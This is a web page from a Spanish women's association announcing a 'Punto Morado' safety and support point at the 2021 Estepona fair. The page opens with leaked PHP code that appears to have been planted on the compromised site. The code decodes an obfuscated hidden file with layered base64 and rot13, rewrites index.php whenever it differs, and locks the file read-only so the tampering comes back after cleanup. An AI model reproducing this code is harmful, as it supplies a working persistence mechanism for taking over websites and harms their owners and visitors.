$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Punto morado en la Feria 2021 de Estepona – Asociación Mujeres Peñas Blancas

Punto morado en la Feria 2021 de Estepona

La Feria de Estepona 2021 da comienzo, y hoy más que nunca queremos que todas se sientan seguras celebrando (con moderación) las festividades de nuestra localidad. Para proporcionar dicha seguridad, la Asociación de Mujeres Peñas Blancas, y gracias a la colaboración del ayuntamiento de Estepona, colocará justo al principio de la zona de casetas el famoso Punto Morado. El Punto Morado servirá de ayuda y consejo para cualquier persona que se sienta insegura o para socorrer a aquellas personas víctimas de agresión.